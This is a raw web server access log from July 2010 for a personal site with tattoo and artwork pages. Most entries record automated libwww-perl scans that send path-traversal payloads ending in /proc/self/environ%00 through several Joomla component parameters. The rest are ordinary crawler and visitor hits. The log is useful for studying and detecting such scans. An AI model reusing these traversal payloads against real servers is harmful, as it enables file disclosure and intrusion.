174.34.185.226 - - [09/Jul/2010:08:23:23 -0500] "GET /logs/access_log.1275696000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
174.34.185.226 - - [09/Jul/2010:08:23:46 -0500] "GET /logs/access_log.1275696000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
62.24.252.133 - - [09/Jul/2010:08:26:39 -0500] "GET /robots.txt HTTP/1.0" 404 282 "http://tomdolan.pconline.com/robots.txt""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
174.34.185.226 - - [09/Jul/2010:08:31:08 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
174.34.185.226 - - [09/Jul/2010:08:31:16 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
174.34.185.226 - - [09/Jul/2010:08:31:38 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
174.34.185.226 - - [09/Jul/2010:08:31:45 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
174.34.185.226 - - [09/Jul/2010:08:32:29 -0500] "GET /logs/access_log.1277164800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
174.34.185.226 - - [09/Jul/2010:08:32:29 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
174.34.185.226 - - [09/Jul/2010:08:32:29 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
174.34.185.226 - - [09/Jul/2010:08:32:34 -0500] "GET /logs/access_log.1277164800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
174.34.185.226 - - [09/Jul/2010:08:32:34 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
174.34.185.226 - - [09/Jul/2010:08:32:34 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
174.34.185.226 - - [09/Jul/2010:08:32:41 -0500] "GET /logs/access_log.1275696000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
174.34.185.226 - - [09/Jul/2010:08:32:45 -0500] "GET /logs/access_log.1275696000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
174.34.185.226 - - [09/Jul/2010:08:37:51 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
174.34.185.226 - - [09/Jul/2010:08:39:15 -0500] "GET /logs/access_log.1276905600//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
174.34.185.226 - - [09/Jul/2010:08:39:15 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
174.34.185.226 - - [09/Jul/2010:08:39:15 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
174.34.185.226 - - [09/Jul/2010:08:39:25 -0500] "GET /logs/access_log.1276905600//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
174.34.185.226 - - [09/Jul/2010:08:39:25 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
174.34.185.226 - - [09/Jul/2010:08:39:25 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
174.34.185.226 - - [09/Jul/2010:08:40:26 -0500] "GET /logs/access_log.1276732800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
174.34.185.226 - - [09/Jul/2010:08:40:26 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
174.34.185.226 - - [09/Jul/2010:08:40:26 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
38.101.148.126 - - [09/Jul/2010:08:41:44 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [09/Jul/2010:08:42:04 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
174.34.185.226 - - [09/Jul/2010:08:44:27 -0500] "GET /logs/access_log.1276819200//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
174.34.185.226 - - [09/Jul/2010:08:44:27 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
174.34.185.226 - - [09/Jul/2010:08:44:27 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
174.34.185.226 - - [09/Jul/2010:08:44:31 -0500] "GET /logs/access_log.1276819200//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
174.34.185.226 - - [09/Jul/2010:08:44:31 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
174.34.185.226 - - [09/Jul/2010:08:44:31 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
174.34.185.226 - - [09/Jul/2010:08:46:43 -0500] "GET /logs/access_log.1276732800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
174.34.185.226 - - [09/Jul/2010:08:46:43 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
174.34.185.226 - - [09/Jul/2010:08:46:43 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
174.34.185.226 - - [09/Jul/2010:08:46:48 -0500] "GET /logs/access_log.1276732800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
174.34.185.226 - - [09/Jul/2010:08:46:49 -0500] "GET /logs/access_log.1276732800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
209.61.244.6 - - [09/Jul/2010:08:47:50 -0500] "GET /logs/access_log.1277164800/?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.76"
209.61.244.6 - - [09/Jul/2010:08:47:51 -0500] "GET /?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.76"
209.61.244.6 - - [09/Jul/2010:08:47:52 -0500] "GET /logs/access_log.1277164800/?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.76"
209.61.244.6 - - [09/Jul/2010:08:47:53 -0500] "GET /logs/?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 12637 "-""libwww-perl/5.76"
209.61.244.6 - - [09/Jul/2010:08:47:53 -0500] "GET /?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.76"
209.61.244.6 - - [09/Jul/2010:08:47:58 -0500] "GET /logs/?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 12637 "-""libwww-perl/5.76"
209.61.244.6 - - [09/Jul/2010:08:54:26 -0500] "GET /logs/access_log.1277683200/?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.76"
209.61.244.6 - - [09/Jul/2010:08:54:26 -0500] "GET /logs/access_log.1277683200/?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.76"
163.157.254.25 - - [09/Jul/2010:08:55:05 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://zamyr.freeblogshost.in/100505/""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)"
174.34.185.226 - - [09/Jul/2010:08:59:41 -0500] "GET /logs/access_log.1276214400//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
174.34.185.226 - - [09/Jul/2010:08:59:41 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
174.34.185.226 - - [09/Jul/2010:08:59:41 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
174.34.185.226 - - [09/Jul/2010:09:01:14 -0500] "GET /logs/access_log.1277424000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
174.34.185.226 - - [09/Jul/2010:09:04:29 -0500] "GET /logs/access_log.1276214400//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
174.34.185.226 - - [09/Jul/2010:09:04:29 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
174.34.185.226 - - [09/Jul/2010:09:04:29 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
174.34.185.226 - - [09/Jul/2010:09:06:01 -0500] "GET /logs/access_log.1277424000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
207.46.199.55 - - [09/Jul/2010:09:06:58 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.55 - - [09/Jul/2010:09:07:34 -0500] "GET /logs/access_log.1170979200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.121.26.63 - - [09/Jul/2010:09:11:05 -0500] "GET ////index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-""libwww-perl/5.813"
174.34.185.226 - - [09/Jul/2010:09:12:56 -0500] "GET /logs/access_log.1277164800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
174.34.185.226 - - [09/Jul/2010:09:12:56 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
174.34.185.226 - - [09/Jul/2010:09:12:56 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
174.34.185.226 - - [09/Jul/2010:09:14:07 -0500] "GET /logs/access_log.1275696000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
67.195.112.232 - - [09/Jul/2010:09:18:21 -0500] "GET /logs/access_log.1205884800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
65.55.37.202 - - [09/Jul/2010:09:19:38 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.232 - - [09/Jul/2010:09:19:45 -0500] "GET /logs/ HTTP/1.0" 200 12604 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.232 - - [09/Jul/2010:09:21:26 -0500] "GET /logs/access_log.1278201600 HTTP/1.0" 200 673948 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.232 - - [09/Jul/2010:09:21:34 -0500] "GET /logs/access_log.1277769600 HTTP/1.0" 200 720180 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.232 - - [09/Jul/2010:09:21:36 -0500] "GET /logs/access_log.1278288000 HTTP/1.0" 200 1134955 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.232 - - [09/Jul/2010:09:23:17 -0500] "GET /logs/access_log.1278115200 HTTP/1.0" 200 741574 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
174.34.185.226 - - [09/Jul/2010:09:25:16 -0500] "GET /logs/access_log.1277164800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
174.34.185.226 - - [09/Jul/2010:09:25:16 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
174.34.185.226 - - [09/Jul/2010:09:25:16 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
207.46.199.198 - - [09/Jul/2010:09:25:24 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.121.26.63 - - [09/Jul/2010:09:25:49 -0500] "GET /logs/access_log.1276041600////index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 323 "-""libwww-perl/5.813"
91.121.26.63 - - [09/Jul/2010:09:25:50 -0500] "GET ////index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-""libwww-perl/5.813"
91.121.26.63 - - [09/Jul/2010:09:25:50 -0500] "GET /logs////index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-""libwww-perl/5.813"
174.34.185.226 - - [09/Jul/2010:09:26:17 -0500] "GET /logs/access_log.1275696000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
67.195.112.232 - - [09/Jul/2010:09:26:51 -0500] "GET /logs/access_log.1237420800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.232 - - [09/Jul/2010:09:33:48 -0500] "GET /artwork/banners.htm HTTP/1.0" 200 3537 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
69.216.175.2 - - [09/Jul/2010:09:34:20 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
208.43.40.176 - - [09/Jul/2010:09:38:41 -0500] "GET /com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 380 "-""libwww-perl/5.831"
69.216.175.2 - - [09/Jul/2010:09:39:41 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
69.216.175.2 - - [09/Jul/2010:09:39:41 -0500] "GET /logs/access_log.1276214400//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
69.216.175.2 - - [09/Jul/2010:09:39:41 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
69.216.175.2 - - [09/Jul/2010:09:39:43 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
69.216.175.2 - - [09/Jul/2010:09:40:37 -0500] "GET /logs/access_log.1276819200//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
118.69.206.77 - - [09/Jul/2010:09:44:11 -0500] "GET //?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
118.69.206.77 - - [09/Jul/2010:09:44:16 -0500] "GET //?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
118.69.206.77 - - [09/Jul/2010:09:44:49 -0500] "GET /logs/access_log.1277078400//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
118.69.206.77 - - [09/Jul/2010:09:44:49 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
118.69.206.77 - - [09/Jul/2010:09:44:51 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
208.115.111.248 - - [09/Jul/2010:09:45:39 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
69.216.175.2 - - [09/Jul/2010:09:46:20 -0500] "GET /logs/access_log.1277942400/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
69.216.175.2 - - [09/Jul/2010:09:46:20 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
69.216.175.2 - - [09/Jul/2010:09:46:20 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
69.216.175.2 - - [09/Jul/2010:09:46:43 -0500] "GET /logs/access_log.1276128000/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
118.69.206.77 - - [09/Jul/2010:09:50:55 -0500] "GET /logs/access_log.1275696000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
220.181.7.47 - - [09/Jul/2010:09:58:32 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
65.55.51.110 - - [09/Jul/2010:10:03:15 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.195.224 - - [09/Jul/2010:10:04:34 -0500] "GET /logs/access_log.1227052800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
95.220.133.59 - - [09/Jul/2010:10:06:00 -0500] "GET /logs/access_log.1221868800 HTTP/1.1" 404 310 "-""Opera/8.01 (Macintosh; U; PPC Mac OS; en)"
72.249.119.49 - - [09/Jul/2010:10:07:18 -0500] "GET /index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
72.249.119.49 - - [09/Jul/2010:10:11:20 -0500] "GET /logs/access_log.1276128000/index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
72.249.119.49 - - [09/Jul/2010:10:11:20 -0500] "GET /index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
72.249.119.49 - - [09/Jul/2010:10:11:20 -0500] "GET /logs/index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
72.249.119.49 - - [09/Jul/2010:10:11:21 -0500] "GET /logs/access_log.1275609600/index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
207.46.199.180 - - [09/Jul/2010:10:11:29 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.244 - - [09/Jul/2010:10:11:34 -0500] "GET /logs/access_log.1169424000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
38.101.148.126 - - [09/Jul/2010:10:12:04 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [09/Jul/2010:10:12:12 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
187.45.193.143 - - [09/Jul/2010:10:14:26 -0500] "GET /logs/access_log.1277510400/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
187.45.193.143 - - [09/Jul/2010:10:14:27 -0500] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
187.45.193.143 - - [09/Jul/2010:10:14:27 -0500] "GET /logs/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
94.23.46.76 - - [09/Jul/2010:10:17:34 -0500] "GET /logs/access_log.1275696000/?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.803"
94.23.46.76 - - [09/Jul/2010:10:17:34 -0500] "GET /?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
94.23.46.76 - - [09/Jul/2010:10:17:34 -0500] "GET /logs/?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 12637 "-""libwww-perl/5.803"
94.23.46.76 - - [09/Jul/2010:10:17:44 -0500] "GET /logs/access_log.1277164800/?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.803"
95.74.8.17 - - [09/Jul/2010:10:18:11 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.it/search?q=vintage+tattoos+shop&hl=it&prmd=i&ei=Tj03TKzpEcTGOITB_NoE&start=10&sa=N""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
95.74.8.17 - - [09/Jul/2010:10:18:13 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
174.121.191.5 - - [09/Jul/2010:10:18:18 -0500] "GET /logs/access_log.1275696000/?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.810"
